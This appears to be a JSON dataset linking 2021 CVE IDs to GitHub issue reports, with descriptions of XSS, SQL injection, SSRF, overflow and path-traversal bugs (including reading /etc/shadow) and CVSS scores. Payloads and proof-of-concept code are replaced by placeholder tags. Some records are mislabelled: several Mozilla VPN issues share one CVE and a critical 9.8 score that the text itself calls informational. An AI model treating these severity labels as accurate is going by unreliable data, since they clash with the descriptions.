        "description": "FVP NUMBERTAG General: Balrog incorrectly verifies certificate chain. It was found that Balrog does not properly verify the certificate chain, permitting rogue root certificates and their fellowship to pass. The attacker controlled leaf certificate holds a public key that will be used to verify the update used in Windows and APITAG This signifies the risk of state funded attackers who are in charge of a trusted certificate authority being able to perform Man in the Middle attacks on the TLS connection initiated by Mozilla VPN to receive updates. Attackers can now replace the binary code of the update with malicious malware bypassing the Balrog mechanism that intends to detect those attacks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/801",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/801",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:52:13Z",
        "description": "FVP NUMBERTAG WP3: Race condition in Ping Sender could expose gateway IP. It was found that Mozilla VPN was prone to a race condition vulnerability in the Ping Sender that frequently delivers ICMP packets to the internal IP address of the APITAG gateway. Shortly after turning the VPN off, those ICMP packets are at risk of being sent outside of the APITAG tunnel and might reveal which gateway IP was used. Since this event is very rare and unreliable, whilst information leakage is additionally scarce, this issue is of purely informational nature.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/812",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/812",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T16:02:36Z",
        "description": "FVP NUMBERTAG APITAG Auth code could be leaked by injecting port. When a user wants to log into Mozilla VPN, the VPN client will make a request to https:// PATHTAG to obtain an authorization URL. The endpoint takes a port parameter that will be reflected in a APITAG element after the user signs into the web page. It was found that the port parameter can be of arbitrary value. Further, it is possible to inject the @ sign, so that the request will go to an arbitrary host instead of localhost. Theoretically, an attacker can give a crafted URL to a victim and once the victim uses it to log in, their authorization code will be leaked to the attacker\u2019s website. However, the CSP in place contains a strict img src directive which prevents exploitation.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29978",
        "Issue_Url_old": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/800",
        "Issue_Url_new": "https://github.com/mozilla-mobile/mozilla-vpn-client/issues/800",
        "Repo_new": "mozilla-mobile/mozilla-vpn-client",
        "Issue_Created_At": "2021-04-07T15:50:57Z",
        "description": "FVP NUMBERTAG WP NUMBERTAG Authenticationlistener allows disturbance of login. It was found that Mozilla VPN in desktop environments sets up an HTTP server listening on a port acting as the APITAG callback expecting an Authorization Code to complete the Authentication of Mozilla VPN. This means there is a risk of attackers spamming requests to the local server via APITAG potentially disturbing the login process of the apps. This is possible as the local HTTP server is not protected by an additional secret and cannot distinguish between legitimate requests from malicious ones.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29996",
        "Issue_Url_old": "https://github.com/marktext/marktext/issues/2548",
        "Issue_Url_new": "https://github.com/marktext/marktext/issues/2548",
        "Repo_new": "marktext/marktext",
        "Issue_Created_At": "2021-04-04T20:40:31Z",
        "description": "XSS vulnerability could result in RCE CVETAG . Description Cross Site Scripting (XSS) vulnerability that could result in Remote Code Execution (RCE). CVETAG was assigned for this issue. Steps to reproduce NUMBERTAG Create a .md file that contains: APITAG APITAG ` Expected behavior: Language input for the fenced code block should be sanitized before rendered. Actual behavior: HTML stored as language input is not sanitized. Arbitrary javascript code is executed upon rendering. Processes outside of Mark Text could be executed due to APITAG being enabled. Proof of Concept FILETAG Versions Mark Text version NUMBERTAG Operating system: Windows, Linux, APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-30014",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1721",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1721",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-03-29T06:03:15Z",
        "description": "A Integer number overflow in function hevc_parse_slice_segment.. There is a integer overflow in APITAG function hevc_parse_slice_segment. Below code: CODETAG However, function may return a negative number to pps_id, which smaller than NUMBERTAG Results a crash in followed execution. In command Line: FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30015",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1719",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1719",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-03-29T05:24:39Z",
        "description": "A Null Pointer Dereference In APITAG There is a Null Pointer Dereference in function APITAG \uff0c The pid comes from function APITAG , the APITAG maybe NULL. Result a crash in APITAG . In command line: FILETAG In gdb: FILETAG The crafted file is in attach zip:",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30019",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1723",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1723",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-03-29T07:23:30Z",
        "description": "A integer (heap) overflow in function adts_dmx_process. In APITAG , function APITAG . There is a sub codes like as below: APITAG However, with crafted file, ctx APITAG may be smaller than ctx APITAG So, the size may be a negative number, which results a heap overflow in memcpy. In Command line: gpac info bug6 FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3002",
        "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/202",
        "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/202",
        "Repo_new": "seopanel/seo-panel",
        "Issue_Created_At": "2021-01-01T11:31:37Z",
        "description": "FILETAG I'm going to request CVE",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-30020",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1722",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1722",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-03-29T06:29:39Z",
        "description": "A stack overflow in function gf_hevc_read_pps_bs_internal. In APITAG , function APITAG . There is a loop as below: ERRORTAG However, with crafted file, pps >num_tile_columns may be larger than sizeof(pps >column_width), which results a stack overflow in the loop. In Command line: FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30022",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1720",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1720",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-03-29T05:34:17Z",
        "description": "A Integer Overflow in function gf_avc_read_pps_bs_internal. There is a integer overflow in APITAG , function APITAG . Below code: APITAG pps_id may be a negative number, so will not return. However, avc >pps only has NUMBERTAG unit, so overflow, which results a crash . More than, because of the APITAG , the vuln may lead to an any addr write. In command Line: FILETAG In gdb: FILETAG The crafted file is in the attached zip: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30027",
        "Issue_Url_old": "https://github.com/mity/md4c/issues/155",
        "Issue_Url_new": "https://github.com/mity/md4c/issues/155",
        "Repo_new": "mity/md4c",
        "Issue_Created_At": "2021-03-27T18:39:10Z",
        "description": "Use of uninitialized value in the APITAG function. Hi, While fuzzing md4c NUMBERTAG with AFL++ and MSAN, I found out that the APITAG function may use uninitialized memory. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG with memory origin tracking option APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30030",
        "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/1",
        "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/1",
        "Repo_new": "remoteclinic/remoteclinic",
        "Issue_Created_At": "2021-03-28T13:53:58Z",
        "description": "Cross Site Scripting APITAG XSS) vulnerability in /patients . Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page (patients). Vulnerable Endpoint: URLTAG Step To Reproduce NUMBERTAG Login to Application as a Doctor NUMBERTAG Now got to APITAG Patient\". FILETAG NUMBERTAG Register a Patient Name with below XSS Payload: FILETAG FILETAG NUMBERTAG After Register Patient, go to APITAG FILETAG NUMBERTAG SS Excecuted. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-30034",
        "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/5",
        "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/5",
        "Repo_new": "remoteclinic/remoteclinic",
        "Issue_Created_At": "2021-03-29T14:48:24Z",
        "description": "Stored XSS vulnerability in /dashboard. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG Step To Reproduce NUMBERTAG Login in Application as a doctor NUMBERTAG Register a patient. FILETAG FILETAG NUMBERTAG After Register a Patient, a page redirect you to \"register report page\". FILETAG NUMBERTAG Here is APITAG field where i inject XSS payload. FILETAG FILETAG NUMBERTAG After Register Report, Click on home. FILETAG NUMBERTAG SS Executed on Dashboard Endpoint. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-30039",
        "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/8",
        "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/8",
        "Repo_new": "remoteclinic/remoteclinic",
        "Issue_Created_At": "2021-03-31T11:45:59Z",
        "description": "Stored XSS vulnerability in /patients/ FILETAG APITAG ID}. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG (In my case NUMBERTAG is My Patient Report ID). Steps to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG Register New Patient. FILETAG FILETAG NUMBERTAG After Register New Patient, a page redirect to Register Report Page, when you scroll down page two fields there APITAG and APITAG Pressure\" where i inject XSS Payload: FILETAG FILETAG NUMBERTAG Now go to home page. FILETAG NUMBERTAG Click on Report which shows on dashboard APITAG FILETAG NUMBERTAG SS Executed on reports.php endpoint. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-30042",
        "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/11",
        "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/11",
        "Repo_new": "remoteclinic/remoteclinic",
        "Issue_Created_At": "2021-03-31T17:31:59Z",
        "description": "Stored XSS vulnerability in APITAG ID}. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG (in my case NUMBERTAG is Clinic ID). Step To Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG When you scroll down the main dashboard page, there is clinics options, Click APITAG Clinic\". FILETAG NUMBERTAG Here is four fields vulnerable for XSS APITAG ID} endpoint, APITAG Name\", APITAG Address\", APITAG City\" and APITAG Contact\", Inject XSS Payload in APITAG Name\", APITAG Address\", APITAG City\" and APITAG Contact\". FILETAG FILETAG NUMBERTAG Click on APITAG NUMBERTAG Now Click on APITAG Directory\". FILETAG NUMBERTAG After click on APITAG Directory\", you direct to /clinics/ endpoint where clinics directory show. Click on Clinic where XSS name show. FILETAG NUMBERTAG SS Executed on APITAG ID} endpoint. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-30044",
        "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/13",
        "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/13",
        "Repo_new": "remoteclinic/remoteclinic",
        "Issue_Created_At": "2021-04-01T17:27:54Z",
        "description": "Stored XSS vulnerability Site Wide. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: All Endpoints are vulnerable to XSS. Step to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG Create New Staff Member. FILETAG NUMBERTAG Put XSS Payload on APITAG Name\" and APITAG Name\" of Staff. Both Fields are vulnerable XSS APITAG Wide). FILETAG FILETAG NUMBERTAG Now Click on Register. FILETAG NUMBERTAG Profile Created. FILETAG NUMBERTAG Now APITAG FILETAG NUMBERTAG Now Login to that Staff account which i created in the name of XSS Payload. FILETAG NUMBERTAG SS Executed on /dashboard/ endpoint because staff member name including APITAG Name\" and APITAG Name\" Both are reflected on all the pages/endpoints. FILETAG > Go to /patients/ endpoint. FILETAG > Go to FILETAG endpoint. FILETAG > Go to FILETAG endpoint. FILETAG I tested all endpoints of APITAG NUMBERTAG all are vulnerable to XSS because of APITAG Name\" and APITAG Name\" of Staff reflected all the pages and some of the endpoints i mentioned in the form of screenshots above.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-30045",
        "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/5975",
        "Issue_Url_new": "https://github.com/serenityos/serenity/issues/5975",
        "Repo_new": "serenityos/serenity",
        "Issue_Created_At": "2021-03-27T13:56:01Z",
        "description": "APITAG Buffer overflow in APITAG Found with APITAG File: FILETAG Trace: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-30046",
        "Issue_Url_old": "https://github.com/ukoethe/vigra/issues/494",
        "Issue_Url_new": "https://github.com/ukoethe/vigra/issues/494",
        "Repo_new": "ukoethe/vigra",
        "Issue_Created_At": "2021-03-31T09:32:15Z",
        "description": "Segmentation Fault error in APITAG of APITAG Hello, Using hugin APITAG software verdandi adopting vigra, I encountered on the segmentation fault error. ( URLTAG The root cause is assumed to be from Illegal reference by ERRORTAG of debian package > libvigraimpex dev/focal,now NUMBERTAG dfsg NUMBERTAG ubuntu1 The APITAG is assumed to be out of bound without any appropriate check of the valid address dereferenced by scanline. See PATHTAG lines; CODETAG The running command and backtrace is ERRORTAG FILETAG I attached the poc file on this post. Please kindly check the error. Best, Choongin Lee",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-30048",
        "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/39",
        "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/39",
        "Repo_new": "201206030/novel-plus",
        "Issue_Created_At": "2021-04-06T07:52:39Z",
        "description": "novel plus Arbitrary File Download. Vulnerable code: PATHTAG APITAG = \"/download\") public void APITAG APITAG APITAG APITAG resp) throws Exception { String APITAG = APITAG + APITAG APITAG in = new APITAG APITAG = APITAG \"UTF NUMBERTAG APITAG Disposition\", \"attachment;filename=\" + APITAG APITAG APITAG out = APITAG APITAG b = new byte NUMBERTAG int len NUMBERTAG while ((len = in.read(b NUMBERTAG APITAG NUMBERTAG len); } APITAG APITAG APITAG } Guide: APITAG in to background management NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-30074",
        "Issue_Url_old": "https://github.com/docsifyjs/docsify/issues/1549",
        "Issue_Url_new": "https://github.com/docsifyjs/docsify/issues/1549",
        "Repo_new": "docsifyjs/docsify",
        "Issue_Created_At": "2021-03-31T02:44:15Z",
        "description": "FILETAG NUMBERTAG Cross Site Scripting . APITAG APITAG APITAG APITAG APITAG Bug Report Steps to reproduce NUMBERTAG create a simple docsify project file tree APITAG FILETAG CODETAG FILETAG ERRORTAG FILETAG APITAG NUMBERTAG start a http server FILETAG FILETAG when user search something near XSS payload and the javascript which should rendering as markdown will be execute NUMBERTAG input x in search filed FILETAG What is current behaviour What is the expected behaviour Other relevant information APITAG [ ] Bug does still occur when all/other plugins are disabled? Your OS: Mac OS FILETAG version: APITAG npm/yarn version: Browser version: Docsify version NUMBERTAG Docsify plugins: search.js APITAG Please create a reproducible sandbox FILETAG Mention the docsify version in which this bug was not present (if any)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-30081",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/74",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/74",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2021-03-31T16:05:45Z",
        "description": "emlog NUMBERTAG stable has SQL Injection vulnerability. Login Required APITAG in FILETAG line NUMBERTAG ERRORTAG There is no filtering for the pages parameter and passed into the APITAG method. in PATHTAG line NUMBERTAG ERRORTAG obviously, there is an INSERT SQL Injection vulnerability,we can use single quotation marks to close and inject. use burpsuite and sqlmap to verify this vulnerability: APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-30082",
        "Issue_Url_old": "https://github.com/dignajar/gris/issues/3",
        "Issue_Url_new": "https://github.com/dignajar/gris/issues/3",
        "Repo_new": "dignajar/gris",
        "Issue_Created_At": "2021-04-01T01:47:16Z",
        "description": "Gris CMS NUMBERTAG has Persistent XSS vulnerability. A xss vulnerability was discovered in Gris CMS NUMBERTAG There is a Persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via admin/dashboard APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-30083",
        "Issue_Url_old": "https://github.com/WebFairyNet/Mediat/issues/3",
        "Issue_Url_new": "https://github.com/webfairynet/mediat/issues/3",
        "Repo_new": "WebFairyNet/Mediat",
        "Issue_Created_At": "2021-04-01T06:12:22Z",
        "description": "Mediat NUMBERTAG login page exists an XSS vulnerability. FILETAG has XSS via the return parameter. POC: APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-30108",
        "Issue_Url_old": "https://github.com/liufee/cms/issues/57",
        "Issue_Url_new": "https://github.com/liufee/cms/issues/57",
        "Repo_new": "liufee/cms",
        "Issue_Created_At": "2021-04-01T06:38:09Z",
        "description": "SSRF vulnerability in feehicms NUMBERTAG This is a Server side request forgery vulnerability. We can change HTTP Referer Header to any url, then the server will request it. Details are as follows: We need to send two requests NUMBERTAG First register an account normally, here my account is test NUMBERTAG and the password is NUMBERTAG Log out of our account and log in again from the picture below FILETAG use burpsuite change the http Referer Header, FILETAG The first POC request is as follows CODETAG NUMBERTAG Login with our account and password FILETAG use burpsuite , We don't modify anything The second POC request is as follows CODETAG Then we found that the response packet of the second request contained a NUMBERTAG jump, The jump url is the Referrer header of our first request packet The response of the second request packet is as follows FILETAG NUMBERTAG ulnerability proof FILETAG FILETAG NUMBERTAG how to fix FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-30111",
        "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/4",
        "Issue_Url_new": "https://github.com/0xrayan/cves/issues/4",
        "Repo_new": "0xrayan/cves",
        "Issue_Created_At": "2021-04-08T00:48:15Z",
        "description": "CVETAG . Product : Web School ERP NUMBERTAG Description : A stored XSS vulnerability exists in Web School ERP NUMBERTAG ia APITAG Events) in the event name and description fields. An attack can inject a APITAG code that will be stored in the page. If any visitor sees the events, then the payload will be executed.. Recommendation NUMBERTAG Ensure that any user input is properly sanitized NUMBERTAG Use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur POC : Google Drive URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-30112",
        "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/3",
        "Issue_Url_new": "https://github.com/0xrayan/cves/issues/3",
        "Repo_new": "0xrayan/cves",
        "Issue_Created_At": "2021-04-08T00:37:35Z",
        "description": "CVETAG . Product : Web School ERP NUMBERTAG Description : Web School ERP NUMBERTAG contains a cross site request forgery (CSRF) vulnerability that allows a remote attacker to create a student_leave_application request through PATHTAG The application fails to validate the CSRF token for a POST request using Guardian privilege. Recommendations NUMBERTAG Implement APITAG and make sure it's validating in back end server as well NUMBERTAG Implement an interceptor which appends token value to every (state changing) request in custom request header APITAG Video POC : Google Drive URLTAG POC : CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-30113",
        "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/1",
        "Issue_Url_new": "https://github.com/0xrayan/cves/issues/1",
        "Repo_new": "0xrayan/cves",
        "Issue_Created_At": "2021-04-08T00:19:05Z",
        "description": "CVETAG . Product : Web School ERP NUMBERTAG Description: A blind XSS vulnerability exists in Web School ERP NUMBERTAG ia APITAG Events) in event name filed & description filed. An attacker can inject a APITAG code that will be stored in the page. If any visitor sees the event, then the payload will be executed and sends the victim's information to the attacker website.. Recommendation Ensure that any user input is properly sanitized POC : _As show below it's the output from XSS Hunter Server_ FILETAG FILETAG DOM ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-30114",
        "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/2",
        "Issue_Url_new": "https://github.com/0xrayan/cves/issues/2",
        "Repo_new": "0xrayan/cves",
        "Issue_Created_At": "2021-04-08T00:29:10Z",
        "description": "CVETAG . Product : Web School ERP NUMBERTAG Description : Web School ERP NUMBERTAG contains a cross site request forgery (CSRF) vulnerability that allows a remote attacker to create a voucher payment request through PATHTAG The application fails to validate the CSRF token for a POST request using admin privilege. Recommendations NUMBERTAG Implement APITAG and make sure it's validating in back end server as well NUMBERTAG Implement an interceptor which appends token value to every (state changing) request in custom request header APITAG Video POC : Google Drive URLTAG POC : ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3013",
        "Issue_Url_old": "https://github.com/BurntSushi/ripgrep/issues/1773",
        "Issue_Url_new": "https://github.com/burntsushi/ripgrep/issues/1773",
        "Repo_new": "burntsushi/ripgrep",
        "Issue_Created_At": "2021-01-03T09:02:48Z",
        "description": "FILETAG . (As I couldn't find proper contact information to report a vulnerability, I used the email from URLTAG Since I believe this vulnerability can be exploited, I'm not publishing the detail here. MENTIONTAG Can you check the inbox, please?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-30141",
        "Issue_Url_old": "https://github.com/friendica/friendica/issues/10110",
        "Issue_Url_new": "https://github.com/friendica/friendica/issues/10110",
        "Repo_new": "friendica/friendica",
        "Issue_Created_At": "2021-04-01T18:23:33Z",
        "description": "An unauthenticated visitor can access a path like PATHTAG FILETAG Expected Result: Access denied error page. Platform Info Friendica Version NUMBERTAG rc Friendica Source: git PHP version NUMBERTAG SQL version: APITAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-30151",
        "Issue_Url_old": "https://github.com/mperham/sidekiq/issues/4852",
        "Issue_Url_new": "https://github.com/sidekiq/sidekiq/issues/4852",
        "Repo_new": "sidekiq/sidekiq",
        "Issue_Created_At": "2021-03-24T21:56:32Z",
        "description": "Cross site scripting (XSS). Hi there, I found an XSS vulnerability affecting version NUMBERTAG and maybe anything below that. APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3019",
        "Issue_Url_old": "https://github.com/maybe-why-not/lanproxy/issues/1",
        "Issue_Url_new": "https://github.com/maybe-why-not/lanproxy/issues/1",
        "Repo_new": "maybe-why-not/lanproxy",
        "Issue_Created_At": "2021-01-05T02:36:29Z",
        "description": "Path traversal vulnerability in lanproxy leads to connection to the intranet. Vendor of the product: URLTAG Payload: URLTAG Read configuration file FILETAG Configure the proxy to connect to the intranet after logging in with the password FILETAG Read /etc/shadow FILETAG Fingerprint: URLTAG FILETAG",
